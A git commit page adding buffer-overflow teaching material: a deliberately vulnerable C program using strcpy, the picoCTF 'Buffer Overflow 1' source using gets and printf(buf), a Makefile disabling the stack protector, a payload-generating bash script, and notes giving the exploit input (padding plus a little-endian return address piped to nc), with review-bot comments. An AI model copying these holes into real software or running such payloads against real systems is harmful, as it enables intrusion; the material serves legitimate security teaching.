Examples and stuff

Valentin Brandl 2022-09-28 19:22:48 +02:00
parent 1f6b8db99d
commit 525e0ca1cc
No known key found for this signature in database
GPG Key ID: 62E7C7F2C48DBBF2
9 changed files with 100 additions and 1 deletions

1
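--- a/assets/logic/.gitignore
+++ b/assets/logic/.gitignore
@@ -0,0 +1 @@
+logic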

16
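--- a/assets/logic/Makefile
+++ b/assets/logic/Makefile
@@ -0,0 +1,16 @@
+# use bash so process substutution is available
+CC = gcc
+CFLAGS = -fno-stack-protector -g
+SHELL = bash
+SRC = logic.c
+TARGET = $(SRC:%.c=%)
+.PHONY: build
+build: $(TARGET)
+%: %.c
+$(CC) ${CFLAGS} $< -o $@
+.PHONY: clean
+clean:
+rm -f logic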
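Review bot: The `CFLAGS = -fno-stack-protector -g` line turns off a compiler hardening feature without saying why, and the only comment in the file (`# use bash so process substutution is available`) sits above `CC` although it describes `SHELL = bash`. I would move that comment directly above the `SHELL` line, correcting the spelling to "substitution", and add `# stack protector disabled on purpose: teaching binary, do not reuse these flags` above `CFLAGS`. As a style point, `clean` hard-codes `rm -f logic` while the rest of the file derives the name from `$(TARGET)`; `rm -f $(TARGET)` keeps the two in step.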


@ -3,7 +3,7 @@
void foo(char *input) {
int is_logged_in = 0;
char buf[50];
char buf[64];
strcpy(buf, input);
if (is_logged_in) {
puts("logged in!!1!");
@ -13,5 +13,9 @@ void foo(char *input) {
}
int main(int argc, char **argv) {
foo(argv[1]);
if (argc != 2) {
return 1;
}
foo(argv[1]);
return 0;
}
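Review bot: As rendered, the first `foo(argv[1]);` in `main` still sits above the new `if (argc != 2)` guard, so with no argument `strcpy` in `foo` receives a NULL `argv[1]` before the check runs, and with one argument `foo` runs twice. The page's addition and deletion counts suggest that line is unchanged context rather than a removal, but the +/- markers are lost here, so this should be confirmed against the file. If it holds, drop the earlier call so the body is `if (argc != 2) { return 1; }` followed by the single `foo(argv[1]);`. The unbounded `strcpy(buf, input)` looks like the intended subject of the exercise; a comment such as `/* deliberately unbounded copy: overflow demo, do not reuse */` above it would make that explicit. The middle of `foo` lies between the two hunks and is not visible.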

8
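--- a/assets/logic/solution.md
+++ b/assets/logic/solution.md
@@ -0,0 +1,8 @@
+# Beispiel 1
+* Debugger `gdb`
+* `list` für Code
+* `break <n>` für Breakpoint
+* `run $(python -c 'print("A"*77)')`
+* `show is_logged_in`
+* `continue`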


@ -0,0 +1 @@
payload


@ -0,0 +1,17 @@
#!/usr/bin/env bash
function repeat() {
n="${1}"
string="${2}"
printf "%${n}s" | tr " " "${string}"
}
function main() {
buffer_size="${1}"
address="${2}"
filler="$(repeat "${buffer_size}" A)"
newline="\n"
printf "%s%b%b" "${filler}" "${address}" "${newline}"
}
main "${@}"
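Review bot: `repeat` and `main` assign `n`, `string`, `buffer_size`, `address`, `filler` and `newline` as globals and never check their arguments, so a missing or non-numeric first argument ends up inside the format string of `printf "%${n}s"`. Declaring the variables with `local` and adding a guard such as `[[ "${1}" =~ ^[0-9]+$ ]] || return 1` at the top of `repeat` would address both. `tr " " "${string}"` only ever maps to the first character of `string`, so `repeat` silently works for single-character fillers; a one-line comment above the function saying so would help the next reader.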


@ -0,0 +1,10 @@
# PicoCTF - Buffer Overflow 1
https://play.picoctf.org/practice/challenge/258?category=6&page=1
* Buffergröße bestimmen
* Return Adresse überschreiben
* Adresse der Zielfunktion finden `nm -g -C vuln`
* Little Endian!
* `./payload.sh 44 "\xf6\x91\x04\x08" | nc ...`
* `perl -e 'print "A"x44 . "\xf6\x91\x04\x08\n"'`

Binary file not shown.


@ -0,0 +1,42 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include "asm.h"
#define BUFSIZE 32
#define FLAGSIZE 64
void win() {
char buf[FLAGSIZE];
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("%s %s", "Please create 'flag.txt' in this directory with your",
"own debugging flag.\n");
exit(0);
}
fgets(buf,FLAGSIZE,f);
printf(buf);
}
void vuln(){
char buf[BUFSIZE];
gets(buf);
printf("Okay, time to return... Fingers Crossed... Jumping to 0x%x\n", get_return_address());
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
gid_t gid = getegid();
setresgid(gid, gid, gid);
puts("Please enter your string: ");
vuln();
return 0;
}
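Review bot: In `win()` the result of `fgets(buf,FLAGSIZE,f)` is not checked and `buf` is then passed as the format string in `printf(buf)`, so an empty `flag.txt` prints an uninitialised buffer and any `%` in the file is interpreted as a conversion. `if (fgets(buf, FLAGSIZE, f) == NULL) { exit(1); }` followed by `fputs(buf, stdout);` avoids both; `f` is also never closed. `gets(buf)` in `vuln()` looks like the deliberate subject of the exercise, judging by the title of the accompanying notes, and a file-header comment stating that this is an intentionally vulnerable teaching sample would make that clear to anyone who finds the file on its own. The return value of `setresgid` in `main` is ignored as well.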